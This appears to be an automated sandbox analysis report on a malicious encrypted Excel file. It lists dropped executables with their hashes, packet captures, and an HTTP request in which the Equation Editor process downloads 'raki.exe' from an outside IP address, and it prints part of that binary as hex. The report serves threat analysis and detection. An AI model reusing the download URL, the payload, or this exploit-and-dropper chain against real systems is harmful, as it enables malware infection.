      SSDEEP:192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
      MD5:9513E5EF8DDC8B0D9C23C4DFD4AEECA2
      SHA1:E7FC283A9529AA61F612EC568F836295F943C8EC
      SHA-256:88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
      SHA-512:81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
      Malicious:false
      Preview:.PNG........IHDR..............P.l....sRGB.........gAMA......a.....pHYs...t...t..f.x..+.IDATx...|.e............{......z.Y8..Di*E.4*6.@.$$....+!.T.H/..M6..RH.l.R.!AC...>3;3;..4..~...>3.<.<..7.<3..555........c...xo.Z.X.J...Lhv.u.q..C..D......-...#n...!.W..#...x.m..&.S........cG.... s..H.=......,...(((HJJR.s..05J...2m.....=..R..Gs....G.3.z..."............(..1$..)..[..c&t..ZHv..5....3#..~8....Y...............e2...?.0.t.R}ZI..`.&.......rO..U.mK..N.8..C...[..\....G.^y.U.....N.....eff.....A....Z.b.YU....M.j.vC+\.gu..0v..5...fo.....'......^w..y....O.RSS....?.."L.+c.J....ku$._...Av...Z...*Y.0.z..zMsrT.:.<.q.....a.......O.....$2.=|.0.0..A.v..j....h..P.Nv......,.0....z=...I@8m.h.:]..B.q.C.......6...8qB......G\.."L.o..[)..Z.XuJ.pE..Q.u.:..$[K..2.....zM=`.p.Q@.o.LA../.%....EFsk:z...9.z......>z..H,.{{{...C....n..X.b....K.:..2,...C....;.4....f1,G.....p|f6.^._.c..'''Qll..........W.[..s..q+e.:.|..(....aY..yX....}...n.u..8d...L...:B."zuxz..^..m;p..(&&....
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:PNG image data, 139 x 180, 8-bit colormap, non-interlaced
      Category:dropped
      Size (bytes):3747
      Entropy (8bit):7.932023348968795
      Encrypted:false
      SSDEEP:96:4apPN/1Cb2ItR9rXu7p6mtnOCRxMJZtFtQcgBF5c2SGA:1Pp1kRROtrRxSyRjST1
      MD5:5EB99F38CB355D8DAD5E791E2A0C9922
      SHA1:83E61CDD048381C86E3C3EFD19EB9DAFE743ADBA
      SHA-256:5DAC97FDBD2C2D5DFDD60BF45F498BB6B218D8BFB97D0609738D5E250EBBB7E0
      SHA-512:80F32B5740ECFECC5B084DF2C5134AFA8653D79B91381E62A6F571805A6B44D52D6FD261A61A44C33364123E191D974B87E3FEDC69E7507B9927936B79570C86
      Malicious:false
      Preview:.PNG........IHDR.............../.....tEXtSoftware.Adobe ImageReadyq.e<...]PLTE............&f||}\\].........5G}..._l....778....................................................IDATx..]...<.nh........../)....;..~;.U..>.i.$..0*..QF@.)."..,.../._,.y,...z....c.wuI{.Xt.!f.%.!.!....X..<....)..X...K.....T.&h.U4.x.......*......v;.R.a..i.B.......A.T`.....v....N..u.........NG......e....}.4=."{.+.."..7.n....Qi5....4....(.....&.......e...].t...C'.eYFmT..1..CY.c.t.............G./.#..X....{.q.....A..|.N.i.<Y1.^>..j..Zlc....[<.z..HR......b..@.)..U...:-...9'.u. ..-sD..,.h....oo...8..M.8.*.4...........*.f..&X..V......#.BN..&>R.....&.Q.&A}Bl9.-.G.wd`.$...\.......5<..O.wuC....I.....<....(j.c,...%.9..'.....UDP.*@...#.XH.....<V...!.../...(<.../..,...l6u...R...:..t..t......m+....OI...........+X._..|S.x.6..W..../sK.}a..]EO..../....yY.._6..../U.Q.|Z,`.:r.Y.B...I.Z.H...f....SW..}.k.?.^.'..F....?*n1|.?./.....#~|.y.r.j..u.Z...).......F.,m.......6..&..8."o...^..8.B.w...R.\..R.
      Process:C:\Users\Public\vbc.exe
      File Type:data
      Category:dropped
      Size (bytes):67065
      Entropy (8bit):6.6304639756916615
      Encrypted:false
      SSDEEP:1536:/4hyDx26jHEn+GRp9RxjB6JG5ixTugnzsU:D9Vs1pTxV6JGsugzR
      MD5:270B01C8C789557B4D6DEEDFDB1050AD
      SHA1:3445451F85C3BD8824E984977A71268FA4F82240
      SHA-256:6A7FB12A3EE8E9F070024D4573FF1A058451179EC46A1AD2ABC8D2B704E82F37
      SHA-512:69ADFE79E91881FD1A075F57CC1B2B4EFC75FF464546AA8C52EE858B4ED70AF65E61946C952A848491A4CA0629A2E3C86A62DDF6A05DB56C1A35553D392A048F
      Malicious:false
      Preview:9......._f9.9..?.u.f9.......u.8.....u....8......9....u.....bg9....b.D-f9....(~..9.9.....8.9...R.>..f9......>..f9.S..u...8.8.Z8..1.9.9..4..BG..9......f9.9.u.8.9.W9.8......K...?.CG.S.^.s.y...w`.'.tn........9D..n\U.Xgz.,e..../..~...(..]#...i. ......=....1i.z.=..._UG..*..E.O*..R.....}|V.3qv%.w.7..e.J2q..'....cT..g..P+5..MA...7*S.[{..L......N.....%pb....8._4.........8...G...~./.d..:.m.Ax...............................................?..3:....G..UG..Pr................................................~.Pv.....................................................*.o........................................Rh.k............................................WD.9>z.k............................................Rk.k............................................RW.=.................................................{..>~F.BG..G.B...............................................{.=......................................................Y................................................?
      Process:C:\Users\Public\vbc.exe
      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
      Category:dropped
      Size (bytes):12288
      Entropy (8bit):5.814115788739565
      Encrypted:false
      SSDEEP:192:Zjvco0qWTlt70m5Aj/lQ0sEWD/wtYbBHFNaDybC7y+XBz0QPi:FHQlt70mij/lQRv/9VMjzr
      MD5:CFF85C549D536F651D4FB8387F1976F2
      SHA1:D41CE3A5FF609DF9CF5C7E207D3B59BF8A48530E
      SHA-256:8DC562CDA7217A3A52DB898243DE3E2ED68B80E62DDCB8619545ED0B4E7F65A8
      SHA-512:531D6328DAF3B86D85556016D299798FA06FEFC81604185108A342D000E203094C8C12226A12BD6E1F89B0DB501FB66F827B610D460B933BD4AB936AC2FD8A88
      Malicious:false
      Antivirus:
      • Antivirus: Virustotal, Detection: 0%, Browse
      • Antivirus: Metadefender, Detection: 0%, Browse
      • Antivirus: ReversingLabs, Detection: 0%
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L.....Oa...........!....."...........*.......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
      Process:C:\Users\Public\vbc.exe
      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
      Category:dropped
      Size (bytes):23040
      Entropy (8bit):5.575148216618883
      Encrypted:false
      SSDEEP:384:A9zuL7jiVVvNORNHzTdXaP4osxlUoLYuC/NWiOCW:A8zc2RJdqP4oLoQ/8
      MD5:E1FA0E4751888A35553A93778A348A24
      SHA1:98667AE0AB2D955E69C365D62F2DD1A8C839E14E
      SHA-256:A074AA8C960FF9F9F609604DB0B6FEFDD454CEB746DE6749753A551FE7B99B51
      SHA-512:E93E62CC3FFBC2621FD87BD6DAEDF3699799217B49A006D4A891CDBFE4DD89B33DA258C6A4D8CC28FF615CC0F033D83BF761502169D05A6FC9CBC5FF5FC2ABF1
      Malicious:false
      Antivirus:
      • Antivirus: Metadefender, Detection: 0%, Browse
      • Antivirus: ReversingLabs, Detection: 0%
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......4...p...p...p...y.7.d...d...s...p...K...d...v...d...q...d...v...d.[.q...d...q...Richp...........PE..L..................!.....<.......... ........P.....Q......................................@E........................P3.......`..................................X...`...T............................................`.......1.......................text...~;.......<.................. ..`.data...8....P.......@..............@....idata..D....`.......D..............@..@.didat..0....p.......N..............@....rsrc................P..............@..@.reloc..X............V..............@..B................................................................................................................................................................................................................................................................................................
      Process:C:\Users\Public\vbc.exe
      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
      Category:dropped
      Size (bytes):23040
      Entropy (8bit):6.138116359523764
      Encrypted:false
      SSDEEP:384:4j1Pm6AenqNEb9jGvRtb30lEVybDPukC+Rfb6ql4PrxWpmWZr:xlMsP4l2ybJawRr
      MD5:3F305E85F2751C4AA1A4EFDF3240EDA6
      SHA1:FBD849B83E98E5D0F2A2B2F8E3649ADA7078B2E9
      SHA-256:95444BF7752F9092FE00CA6F96FD170820026ED990B1EA59CE34524978B4EB12
      SHA-512:3BC1B150ACC164818C169448E7BCD8BEC7780278E60581E3A21722BE947BDF6016D7A99FB1F06E59057F71A3C965CD882CA974EAF288172D5285B1CEA93769C6
      Malicious:false
      Antivirus:
      • Antivirus: Metadefender, Detection: 0%, Browse
      • Antivirus: ReversingLabs, Detection: 0%
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......O.I...'...'...'.......'...$...'...#...'...&.B.'...&...'..."...'...'...'.......'......'...%...'.Rich..'.................PE..L.....{............!.....B..........pH.......`.......................................P....@A........................PQ......(q..........................................T...........................h................p..$............................text....A.......B.................. ..`.data........`.......F..............@....idata.......p.......H..............@..@.rsrc................R..............@..@.reloc...............V..............@..B................................................................................................................................................................................................................................................................................................................
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:data
      Category:dropped
      Size (bytes):512
      Entropy (8bit):0.0
      Encrypted:false
      SSDEEP:3::
      MD5:BF619EAC0CDF3F68D496EA9344137E8B
      SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
      SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
      SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
      Malicious:false
      Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:data
      Category:dropped
      Size (bytes):512
      Entropy (8bit):0.0
      Encrypted:false
      SSDEEP:3::
      MD5:BF619EAC0CDF3F68D496EA9344137E8B
      SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
      SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
      SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
      Malicious:false
      Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:CDFV2 Encrypted
      Category:dropped
      Size (bytes):191800
      Entropy (8bit):7.957948536702047
      Encrypted:false
      SSDEEP:3072:ri+vYKahh4qHgG0XHCoJVUEmX1j+jrbr9qfXeqHe4O0ViaAb2PxFSfzw4+MdEPvS:GpCqHqiJEmX1j2rbpAXeqdOrPbxCMc5E
      MD5:E96BAF78F2A98321AE47D4D82E608124
      SHA1:E9EA3B397B7C2D5BE07845745F621AEF0D8D4DB0
      SHA-256:180125C408724BB6EF0037C028439058D6F0B8326B679E02D7CBA8D24461C3BF
      SHA-512:A9320B25B8F28BFB93320A4D3D58C31DEBD94079D3902313429487DCED83E5E223481AC38DE4FCBC752D5C6C5B95F5B4B74A7DD03CFCA69C5C4523F3DE34D45C
      Malicious:false
      Preview:......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:data
      Category:dropped
      Size (bytes):512
      Entropy (8bit):0.0
      Encrypted:false
      SSDEEP:3::
      MD5:BF619EAC0CDF3F68D496EA9344137E8B
      SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
      SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
      SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
      Malicious:false
      Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:data
      Category:dropped
      Size (bytes):165
      Entropy (8bit):1.4377382811115937
      Encrypted:false
      SSDEEP:3:vZ/FFDJw2fV:vBFFGS
      MD5:797869BB881CFBCDAC2064F92B26E46F
      SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
      SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
      SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
      Malicious:true
      Preview:.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
      File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
      Category:dropped
      Size (bytes):170120
      Entropy (8bit):7.49730405573374
      Encrypted:false
      SSDEEP:3072:TbG7N2kDTHUpou0lvStHlquLNLb+tAGGTCXIQOKGDYq8rmIdaDm2ghplPd:TbE/HUMFSeKSWSIQOKGDwiIoDyhplV
      MD5:0DCB37FF90B93B7A3225707B1AF111B8
      SHA1:E43402BD22A03687FC4FBE36CBB607ECC7BC1A0F
      SHA-256:4468C48F99C92E56BB04921A42676511C64B39F9AE99FCD08F2A10251618BAF2
      SHA-512:AF5D2C9D6F3EEFEACE0E9F4907251F0EB80494988A607C40B4CDA1F0EA6EE23F1D888D12F9724F6BE16EAEBA52A46F6E79136EC3D4DA0410D6E034E629E091D6
      Malicious:true
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L...Z.Oa.................j..........-5............@.................................|.....@..........................................................................................................................................................text....h.......j.................. ..`.rdata...............n..............@..@.data...............................@....ndata...`...`...........................rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................
      File type:CDFV2 Encrypted
      Entropy (8bit):7.957948536702047
      TrID:
      • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
      File name:7027521.xlsx
      File size:191800
      MD5:e96baf78f2a98321ae47d4d82e608124
      SHA1:e9ea3b397b7c2d5be07845745f621aef0d8d4db0
      SHA256:180125c408724bb6ef0037c028439058d6f0b8326b679e02d7cba8d24461c3bf
      SHA512:a9320b25b8f28bfb93320a4d3d58c31debd94079d3902313429487dced83e5e223481ac38de4fcbc752d5c6c5b95f5b4b74a7dd03cfca69c5c4523f3de34d45c
      SSDEEP:3072:ri+vYKahh4qHgG0XHCoJVUEmX1j+jrbr9qfXeqHe4O0ViaAb2PxFSfzw4+MdEPvS:GpCqHqiJEmX1j2rbpAXeqdOrPbxCMc5E
      File Content Preview:........................>......................................................................................................................................................................................................................................
      Icon Hash:e4e2aa8aa4b4bcb4
      TimestampSource PortDest PortSource IPDest IP
      Jan 26, 2022 10:40:53.428663969 CET4916780192.168.2.2250.16.4.125
      Jan 26, 2022 10:40:53.566884995 CET804916750.16.4.125192.168.2.22
      Jan 26, 2022 10:40:53.566993952 CET4916780192.168.2.2250.16.4.125
      Jan 26, 2022 10:40:53.567604065 CET4916780192.168.2.2250.16.4.125
      Jan 26, 2022 10:40:53.706120968 CET804916750.16.4.125192.168.2.22
      Jan 26, 2022 10:40:53.706151962 CET804916750.16.4.125192.168.2.22
      Jan 26, 2022 10:40:53.706163883 CET804916750.16.4.125192.168.2.22
      Jan 26, 2022 10:40:53.706176996 CET804916750.16.4.125192.168.2.22
      Jan 26, 2022 10:40:53.706288099 CET4916780192.168.2.2250.16.4.125
      Jan 26, 2022 10:40:53.844465971 CET804916750.16.4.125192.168.2.22
      Jan 26, 2022 10:40:53.844506025 CET804916750.16.4.125192.168.2.22
      Jan 26, 2022 10:40:53.844528913 CET804916750.16.4.125192.168.2.22
      Jan 26, 2022 10:40:53.844552040 CET804916750.16.4.125192.168.2.22
      Jan 26, 2022 10:40:53.844574928 CET804916750.16.4.125192.168.2.22
      Jan 26, 2022 10:40:53.844598055 CET804916750.16.4.125192.168.2.22
      Jan 26, 2022 10:40:53.844609022 CET4916780192.168.2.2250.16.4.125
      Jan 26, 2022 10:40:53.844620943 CET804916750.16.4.125192.168.2.22
      Jan 26, 2022 10:40:53.844645023 CET804916750.16.4.125192.168.2.22
      Jan 26, 2022 10:40:53.844646931 CET4916780192.168.2.2250.16.4.125
      Jan 26, 2022 10:40:53.844652891 CET4916780192.168.2.2250.16.4.125
      Jan 26, 2022 10:40:53.844655991 CET4916780192.168.2.2250.16.4.125
      Jan 26, 2022 10:40:53.844657898 CET4916780192.168.2.2250.16.4.125
      Jan 26, 2022 10:40:53.844676018 CET4916780192.168.2.2250.16.4.125
      Jan 26, 2022 10:40:53.983169079 CET804916750.16.4.125192.168.2.22
      Jan 26, 2022 10:40:53.983196020 CET804916750.16.4.125192.168.2.22
      Jan 26, 2022 10:40:53.983218908 CET804916750.16.4.125192.168.2.22
      Jan 26, 2022 10:40:53.983242989 CET804916750.16.4.125192.168.2.22
      Jan 26, 2022 10:40:53.983264923 CET804916750.16.4.125192.168.2.22
      Jan 26, 2022 10:40:53.983288050 CET804916750.16.4.125192.168.2.22
      Jan 26, 2022 10:40:53.983310938 CET804916750.16.4.125192.168.2.22
      Jan 26, 2022 10:40:53.983330965 CET4916780192.168.2.2250.16.4.125
      Jan 26, 2022 10:40:53.983335972 CET804916750.16.4.125192.168.2.22
      Jan 26, 2022 10:40:53.983361959 CET804916750.16.4.125192.168.2.22
      Jan 26, 2022 10:40:53.983406067 CET804916750.16.4.125192.168.2.22
      Jan 26, 2022 10:40:53.983429909 CET804916750.16.4.125192.168.2.22
      Jan 26, 2022 10:40:53.983432055 CET4916780192.168.2.2250.16.4.125
      Jan 26, 2022 10:40:53.983453035 CET804916750.16.4.125192.168.2.22
      Jan 26, 2022 10:40:53.983455896 CET4916780192.168.2.2250.16.4.125
      Jan 26, 2022 10:40:53.983470917 CET4916780192.168.2.2250.16.4.125
      Jan 26, 2022 10:40:53.983475924 CET804916750.16.4.125192.168.2.22
      Jan 26, 2022 10:40:53.983491898 CET4916780192.168.2.2250.16.4.125
      Jan 26, 2022 10:40:53.983499050 CET804916750.16.4.125192.168.2.22
      Jan 26, 2022 10:40:53.983503103 CET4916780192.168.2.2250.16.4.125
      Jan 26, 2022 10:40:53.983520985 CET804916750.16.4.125192.168.2.22
      Jan 26, 2022 10:40:53.983530045 CET4916780192.168.2.2250.16.4.125
      Jan 26, 2022 10:40:53.983549118 CET4916780192.168.2.2250.16.4.125
      Jan 26, 2022 10:40:53.985578060 CET4916780192.168.2.2250.16.4.125
      Jan 26, 2022 10:40:53.985764980 CET804916750.16.4.125192.168.2.22
      Jan 26, 2022 10:40:53.985835075 CET4916780192.168.2.2250.16.4.125
      Jan 26, 2022 10:40:53.986990929 CET4916780192.168.2.2250.16.4.125
      Jan 26, 2022 10:40:54.121912003 CET804916750.16.4.125192.168.2.22
      Jan 26, 2022 10:40:54.121941090 CET804916750.16.4.125192.168.2.22
      Jan 26, 2022 10:40:54.121958017 CET804916750.16.4.125192.168.2.22
      Jan 26, 2022 10:40:54.121974945 CET804916750.16.4.125192.168.2.22
      Jan 26, 2022 10:40:54.121990919 CET804916750.16.4.125192.168.2.22
      Jan 26, 2022 10:40:54.122008085 CET804916750.16.4.125192.168.2.22
      Jan 26, 2022 10:40:54.122025013 CET804916750.16.4.125192.168.2.22
      Jan 26, 2022 10:40:54.122040033 CET4916780192.168.2.2250.16.4.125
      Jan 26, 2022 10:40:54.122044086 CET804916750.16.4.125192.168.2.22
      Jan 26, 2022 10:40:54.122060061 CET804916750.16.4.125192.168.2.22
      Jan 26, 2022 10:40:54.122076035 CET4916780192.168.2.2250.16.4.125
      Jan 26, 2022 10:40:54.122080088 CET4916780192.168.2.2250.16.4.125
      Jan 26, 2022 10:40:54.122080088 CET804916750.16.4.125192.168.2.22
      Jan 26, 2022 10:40:54.122082949 CET4916780192.168.2.2250.16.4.125
      Jan 26, 2022 10:40:54.122097969 CET4916780192.168.2.2250.16.4.125
      Jan 26, 2022 10:40:54.122097969 CET804916750.16.4.125192.168.2.22
      Jan 26, 2022 10:40:54.122113943 CET4916780192.168.2.2250.16.4.125
      Jan 26, 2022 10:40:54.122117043 CET804916750.16.4.125192.168.2.22
      Jan 26, 2022 10:40:54.122127056 CET4916780192.168.2.2250.16.4.125
      Jan 26, 2022 10:40:54.122136116 CET804916750.16.4.125192.168.2.22
      Jan 26, 2022 10:40:54.122148037 CET4916780192.168.2.2250.16.4.125
      Jan 26, 2022 10:40:54.122154951 CET804916750.16.4.125192.168.2.22
      Jan 26, 2022 10:40:54.122169971 CET4916780192.168.2.2250.16.4.125
      Jan 26, 2022 10:40:54.122174025 CET804916750.16.4.125192.168.2.22
      Jan 26, 2022 10:40:54.122184038 CET4916780192.168.2.2250.16.4.125
      Jan 26, 2022 10:40:54.122191906 CET804916750.16.4.125192.168.2.22
      Jan 26, 2022 10:40:54.122210026 CET804916750.16.4.125192.168.2.22
      Jan 26, 2022 10:40:54.122210979 CET4916780192.168.2.2250.16.4.125
      Jan 26, 2022 10:40:54.122226000 CET4916780192.168.2.2250.16.4.125
      Jan 26, 2022 10:40:54.122226954 CET804916750.16.4.125192.168.2.22
      Jan 26, 2022 10:40:54.122242928 CET4916780192.168.2.2250.16.4.125
      Jan 26, 2022 10:40:54.122245073 CET804916750.16.4.125192.168.2.22
      Jan 26, 2022 10:40:54.122256041 CET4916780192.168.2.2250.16.4.125
      Jan 26, 2022 10:40:54.122262955 CET804916750.16.4.125192.168.2.22
      Jan 26, 2022 10:40:54.122270107 CET4916780192.168.2.2250.16.4.125
      Jan 26, 2022 10:40:54.122279882 CET804916750.16.4.125192.168.2.22
      Jan 26, 2022 10:40:54.122294903 CET4916780192.168.2.2250.16.4.125
      Jan 26, 2022 10:40:54.122298002 CET804916750.16.4.125192.168.2.22
      Jan 26, 2022 10:40:54.122308969 CET4916780192.168.2.2250.16.4.125
      Jan 26, 2022 10:40:54.122315884 CET804916750.16.4.125192.168.2.22
      Jan 26, 2022 10:40:54.122324944 CET4916780192.168.2.2250.16.4.125
      Jan 26, 2022 10:40:54.122334957 CET804916750.16.4.125192.168.2.22
      Jan 26, 2022 10:40:54.122349977 CET4916780192.168.2.2250.16.4.125
      Jan 26, 2022 10:40:54.122351885 CET804916750.16.4.125192.168.2.22
      Jan 26, 2022 10:40:54.122364998 CET4916780192.168.2.2250.16.4.125
      Jan 26, 2022 10:40:54.122370005 CET804916750.16.4.125192.168.2.22
      Jan 26, 2022 10:40:54.122380972 CET4916780192.168.2.2250.16.4.125
      Jan 26, 2022 10:40:54.122389078 CET804916750.16.4.125192.168.2.22
      Jan 26, 2022 10:40:54.122406006 CET4916780192.168.2.2250.16.4.125
      Jan 26, 2022 10:40:54.122407913 CET804916750.16.4.125192.168.2.22
      • 50.16.4.125
      Session IDSource IPSource PortDestination IPDestination PortProcess
      0192.168.2.224916750.16.4.12580C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
      TimestampkBytes transferredDirectionData
      Jan 26, 2022 10:40:53.567604065 CET0OUTGET /E/raki.exe HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
      Host: 50.16.4.125
      Connection: Keep-Alive
      Jan 26, 2022 10:40:53.706120968 CET1INHTTP/1.1 200 OK
      Date: Wed, 26 Jan 2022 09:40:54 GMT
      Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.0.14
      Last-Modified: Wed, 26 Jan 2022 04:12:20 GMT
      ETag: "29888-5d6746870006c"
      Accept-Ranges: bytes
      Content-Length: 170120
      Keep-Alive: timeout=5, max=100
      Connection: Keep-Alive
      Content-Type: application/x-msdownload
      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ad 31 08 81 e9 50 66 d2 e9 50 66 d2 e9 50 66 d2 2a 5f 39 d2 eb 50 66 d2 e9 50 67 d2 4c 50 66 d2 2a 5f 3b d2 e6 50 66 d2 bd 73 56 d2 e3 50 66 d2 2e 56 60 d2 e8 50 66 d2 52 69 63 68 e9 50 66 d2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 5a 9b 4f 61 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 6a 00 00 00 da 02 00 00 08 00 00 2d 35 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 a0 05 00 00 04 00 00 7c 04 03 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 10 86 00 00 a0 00 00 00 00 c0 04 00 c8 d5 00 00 00 00 00 00 00 00 00 00 f0 83 02 00 98 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 97 68 00 00 00 10 00 00 00 6a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 a6 14 00 00 00 80 00 00 00 16 00 00 00 6e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 18 b0 02 00 00 a0 00 00 00 06 00 00 00 84 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 60 01 00 00 60 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 c8 d5 00 00 00 c0 04 00 00 d6 00 00 00 8a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1PfPfPf*_9PfPgLPf*_;PfsVPf.V`PfRichPfPELZOaj-5@|@.texthj `.rdatan@@.data@.ndata``.rsrc@@


      Click to jump to process

      Target ID:0
      Start time:10:40:20
      Start date:26/01/2022
      Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      Wow64 process (32bit):false
      Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
      Imagebase:0x13f3d0000
      File size:28253536 bytes
